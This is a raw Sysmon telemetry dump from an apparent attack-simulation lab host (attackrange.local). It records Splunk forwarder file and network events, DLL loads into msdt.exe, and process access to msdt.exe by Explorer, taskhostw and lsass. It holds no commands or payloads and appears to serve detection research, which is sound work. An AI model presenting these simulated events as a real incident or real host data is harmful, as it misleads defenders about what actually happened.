23542300x800000000000000098942Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:55.734{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=16738B7C246E0DC92475315C6A2E7D6B,SHA256=FDA9BBCB9B79D808A8723AF5EA3FCA267D08F470313B36CAA90F62CCF69CD945,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000098941Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.020{326FD73D-A455-6294-3701-000000005502}6180C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53320-false10.0.1.12-8000- 23542300x800000000000000098943Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:56.827{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C392028293DB980272B8E42042080DB4,SHA256=B6C53A5A8837A670CAFF50A58A7A6FEDE810F15C19CE1DA5FB5769B3565DFF50,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098944Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:57.921{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=88FD1681B044BA9718C9D4E04D1DF2D1,SHA256=81B8B12754D187C848D0C2EE2EB994111821E4A8DB6F2B7755320C1AE9BD9F3A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098945Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:59.015{326FD73D-A45C-6294-5601-000000005502}6368NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=087BE7BFD0530C14DCA49BE2A7D8F50B,SHA256=F969B2155D3EC91F6698A0ED70BCAB678847CA50CACCD885986DFAB1AA2379E2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098946Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:00.109{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=67106EA4BCEC57A0C1AE310C178A5ABC,SHA256=9174F7A58E5D045B6887B20DB690B6F28F0DBB0CE9BBAA36616B646233BA3B0A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000098948Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:58.036{326FD73D-A455-6294-3701-000000005502}6180C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53321-false10.0.1.12-8000- 23542300x800000000000000098947Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:01.202{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4D5290CE11D4F100D1EEF2AD8950D0FC,SHA256=CB9AE4E67BCB1251CFE7B71112E6879E344FB24CE0F87FE59A113F834699F7E6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
23542300x800000000000000098949Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:02.296{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ACCC83D7D004706AA21C690503F029EC,SHA256=573EA8AB1C786A76E2AF9B2571CE8B3E0BA6C722DA39A1EF01E8FD587A93CD2C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098950Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:03.390{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A37153EA594FA5D33091D015A6A3C9D9,SHA256=5CABC33E3A0BEFFB43DFF1458B618EAD1CED5DBC6EE30E580569FD7F0FBC1CCC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098951Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:04.484{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=970413568FBB5ECD17F4DDBDDBBAB514,SHA256=4FFB8A58AAC25C1C86C3C4DADABABD4831BD242F3DE1CC184E62FB4979E5AF77,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098952Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:05.577{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C465F4A2D0DBDF64453A80D592C02D0,SHA256=4DA6903F1A6D55FB631DCDB8BD41964F875F85A25F9825DD2C2213EFFFCB009E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098953Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:06.671{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=307393BA6658255D1CCF7AAD9F44226C,SHA256=1ADABA00A7A025AD6490BF5A58E52FEBA80B8DCE571D08604FB734564353C5DE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000098955Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:04.052{326FD73D-A455-6294-3701-000000005502}6180C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53322-false10.0.1.12-8000- 23542300x800000000000000098954Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:07.765{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EABCA10591316B11566BE0B429A6AD29,SHA256=FA6184E14848BB07B0E62AA3265521F3FEEEC53C4A5D36F1B7D5BEBCEAF50559,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098956Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:08.859{326FD73D-A45C-6294-5601-000000005502}6368NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9463606F2791D94B197C4BAD11EC877B,SHA256=48FF47941C31821E590C9BDA6D58B22C643A20F11C5F19B473970EA5FB47D7CA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098957Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:09.952{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4140C494AFAF198EB79A1311EEE3FC75,SHA256=652D82908E811555573A9C202793D9587602C604B695F36CD91ED707F1BEFA89,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098958Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:11.046{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6BC6FE4722F17F2FDC904FDEC938797C,SHA256=89FFB77D8FF735DB6D1BD45AE2E2918FFB54F68321DA77B7471C3A9A7AAB369E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098959Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:12.140{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AEEB2541292847BED5F950D73B839D08,SHA256=47B9F2D650657BC8A410F6588F70BD06EF4E7421B42F50E77C343C26C5A65D98,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098960Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:13.233{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=31114298ECF6B2C7E6B0D03558382735,SHA256=0A0A7B96117268A4BD506B699843407A4A8E5BCA108560A2F0370A3CA9F8C795,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000099035Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.905{326FD73D-A441-6294-EB00-000000005502}48006220C:\Windows\Explorer.EXE{326FD73D-C0CE-6294-360B-000000005502}6728C:\WINDOWS\system32\msdt.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+e9b5f|C:\Windows\System32\SHELL32.dll+eb6a5|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bf3f|C:\Windows\System32\windows.storage.dll+13accb|C:\Windows\System32\windows.storage.dll+1391ef|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099034Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:04:14.905{326FD73D-A441-6294-EB00-000000005502}48006220C:\Windows\Explorer.EXE{326FD73D-C0CE-6294-360B-000000005502}6728C:\WINDOWS\system32\msdt.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+eb5be|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bf3f|C:\Windows\System32\windows.storage.dll+13accb|C:\Windows\System32\windows.storage.dll+1391ef|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099033Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.905{326FD73D-A441-6294-EB00-000000005502}48006220C:\Windows\Explorer.EXE{326FD73D-C0CE-6294-360B-000000005502}6728C:\WINDOWS\system32\msdt.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+e9db4|C:\Windows\System32\SHELL32.dll+eb587|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bf3f|C:\Windows\System32\windows.storage.dll+13accb|C:\Windows\System32\windows.storage.dll+1391ef|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099032Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:04:14.905{326FD73D-A441-6294-EB00-000000005502}48007160C:\Windows\Explorer.EXE{326FD73D-C0CE-6294-360B-000000005502}6728C:\WINDOWS\system32\msdt.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+e9b5f|C:\Windows\System32\SHELL32.dll+eb6a5|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bf3f|C:\Windows\System32\windows.storage.dll+13accb|C:\Windows\System32\windows.storage.dll+1391ef|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099031Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.905{326FD73D-A441-6294-EB00-000000005502}48007160C:\Windows\Explorer.EXE{326FD73D-C0CE-6294-360B-000000005502}6728C:\WINDOWS\system32\msdt.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+eb5be|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bf3f|C:\Windows\System32\windows.storage.dll+13accb|C:\Windows\System32\windows.storage.dll+1391ef|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099030Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:04:14.905{326FD73D-A441-6294-EB00-000000005502}48007160C:\Windows\Explorer.EXE{326FD73D-C0CE-6294-360B-000000005502}6728C:\WINDOWS\system32\msdt.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+e9db4|C:\Windows\System32\SHELL32.dll+eb587|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bf3f|C:\Windows\System32\windows.storage.dll+13accb|C:\Windows\System32\windows.storage.dll+1391ef|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099029Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.905{326FD73D-A441-6294-EB00-000000005502}48007160C:\Windows\Explorer.EXE{326FD73D-C0CE-6294-360B-000000005502}6728C:\WINDOWS\system32\msdt.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bf3f|C:\Windows\System32\windows.storage.dll+13accb|C:\Windows\System32\windows.storage.dll+1391ef|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x800000000000000099028Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.859{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\oleacc.dll7.2.14393.4169 (rs1_release.210107-1130)Active Accessibility Core ComponentMicrosoft® Windows® Operating SystemMicrosoft 
CorporationOLEACC.DLLMD5=1B04659F0A22BFE9142B6AD36467ACEA,SHA256=67BC7C19D71FB98A7B5882B0F2BFC8F2E4491B4ACBE23EE545D54FFCAEC808E9,IMPHASH=427F18493D540CBF4092BD07A97BE51FtrueMicrosoft WindowsValid 734700x800000000000000099027Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.843{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\atlthunk.dll10.0.14393.2969 (rs1_release.190503-1820)atlthunk.dllMicrosoft® Windows® Operating SystemMicrosoft Corporationatlthunk.dllMD5=BECA5E9FA540246333036919A57B7AEF,SHA256=62C24B274B38A88C83EE122CB30142C2135953C1A26582AD003512B238CB7FC9,IMPHASH=E86BAF1A171668A11110B8975A3BDE27trueMicrosoft WindowsValid 10341000x800000000000000099026Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.890{326FD73D-A441-6294-E600-000000005502}44004484C:\Windows\system32\taskhostw.exe{326FD73D-C0CE-6294-360B-000000005502}6728C:\WINDOWS\system32\msdt.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099025Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.890{326FD73D-A441-6294-E600-000000005502}44004484C:\Windows\system32\taskhostw.exe{326FD73D-C0CE-6294-360B-000000005502}6728C:\WINDOWS\system32\msdt.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099024Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:04:14.890{326FD73D-A441-6294-EB00-000000005502}48004500C:\Windows\Explorer.EXE{326FD73D-C0CE-6294-360B-000000005502}6728C:\WINDOWS\system32\msdt.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+e9b5f|C:\Windows\System32\SHELL32.dll+ebd30|C:\Windows\System32\TwinUI.dll+100021|C:\Windows\System32\TwinUI.dll+10088f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099023Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.890{326FD73D-A441-6294-EB00-000000005502}48004500C:\Windows\Explorer.EXE{326FD73D-C0CE-6294-360B-000000005502}6728C:\WINDOWS\system32\msdt.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+81330|C:\Windows\System32\SHELL32.dll+ebcec|C:\Windows\System32\TwinUI.dll+100021|C:\Windows\System32\TwinUI.dll+10088f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099022Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.890{326FD73D-A441-6294-EB00-000000005502}48004500C:\Windows\Explorer.EXE{326FD73D-C0CE-6294-360B-000000005502}6728C:\WINDOWS\system32\msdt.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+e9db4|C:\Windows\System32\SHELL32.dll+ebcc0|C:\Windows\System32\TwinUI.dll+100021|C:\Windows\System32\TwinUI.dll+10088f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x800000000000000099021Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.843{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\msftedit.dll10.0.14393.4704 (rs1_release.211004-1917)Rich Text Edit Control, v8.5Microsoft® Windows® Operating SystemMicrosoft 
CorporationMsftEdit.DLLMD5=76AA789092145B52D12BF1B1E8658294,SHA256=8116A9DDDA0090327E537D1C87EE3C6A1716B6228AD20F71665F0E493ACD47EF,IMPHASH=7C36F76BEB38B735155D539BEBF60532trueMicrosoft WindowsValid 10341000x800000000000000099020Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.890{326FD73D-A441-6294-EB00-000000005502}48004500C:\Windows\Explorer.EXE{326FD73D-C0CE-6294-360B-000000005502}6728C:\WINDOWS\system32\msdt.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+ffe59|C:\Windows\System32\TwinUI.dll+10088f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099019Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.890{326FD73D-A253-6294-0B00-000000005502}632680C:\Windows\system32\lsass.exe{326FD73D-C0CE-6294-360B-000000005502}6728C:\WINDOWS\system32\msdt.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+262f7|C:\Windows\system32\lsasrv.dll+2743d|C:\Windows\system32\lsasrv.dll+26175|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099018Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:04:14.890{326FD73D-A253-6294-0B00-000000005502}632680C:\Windows\system32\lsass.exe{326FD73D-C0CE-6294-360B-000000005502}6728C:\WINDOWS\system32\msdt.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2c06f|C:\Windows\system32\lsasrv.dll+260bd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x800000000000000099017Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.874{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\xmllite.dll10.0.14393.3143 (rs1_release.190725-1725)Microsoft XmlLite LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationXmlLite.dllMD5=64E301CCFADF34810ADA8DE9DBC7720F,SHA256=6EAE1E0E610793C7DF2B27795553F377D2C4126CF74D8EE4A84DE3C3150871F8,IMPHASH=B53F82B33CA6ABD6251152A46E5FF78CtrueMicrosoft WindowsValid 734700x800000000000000099016Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.843{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\xmllite.dll10.0.14393.3143 (rs1_release.190725-1725)Microsoft XmlLite LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationXmlLite.dllMD5=64E301CCFADF34810ADA8DE9DBC7720F,SHA256=6EAE1E0E610793C7DF2B27795553F377D2C4126CF74D8EE4A84DE3C3150871F8,IMPHASH=B53F82B33CA6ABD6251152A46E5FF78CtrueMicrosoft WindowsValid 
